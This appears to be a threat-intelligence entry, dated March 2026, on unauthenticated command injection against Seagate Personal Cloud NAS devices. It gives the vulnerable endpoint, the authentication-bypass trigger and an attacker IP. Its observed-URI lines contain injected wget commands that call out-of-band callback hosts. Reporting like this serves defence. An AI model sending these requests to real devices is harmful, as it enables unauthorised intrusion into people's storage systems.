Seagate NAS backupmgt Command Injection for 2026-03-04
Mar 04, 2026
WebExploit
Last Updated: 12:10 UTC
Unauthenticated OS command injection via the session parameter of /backupmgt/localJob.php on Seagate Personal Cloud NAS devices. The session=fail trigger bypasses authentication before reaching the vulnerable exec() call.
MITRE ATT&CK
Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application
Observed URIs
/backupmgt/localJob.php?session=fail;wget+http://d6jrke6fen1vu8euhd8g6umsbad8datto.oast.live;/backupmgt/localJob.php?session=fail;wget+http://d6jrke6fen1vu8euhd8g15o8jskebrn3f.oast.live;
Attackers by Country
IP Address : ASN : City/Provider
- 198.167.197.194 : AS39287 ab stract : Sweden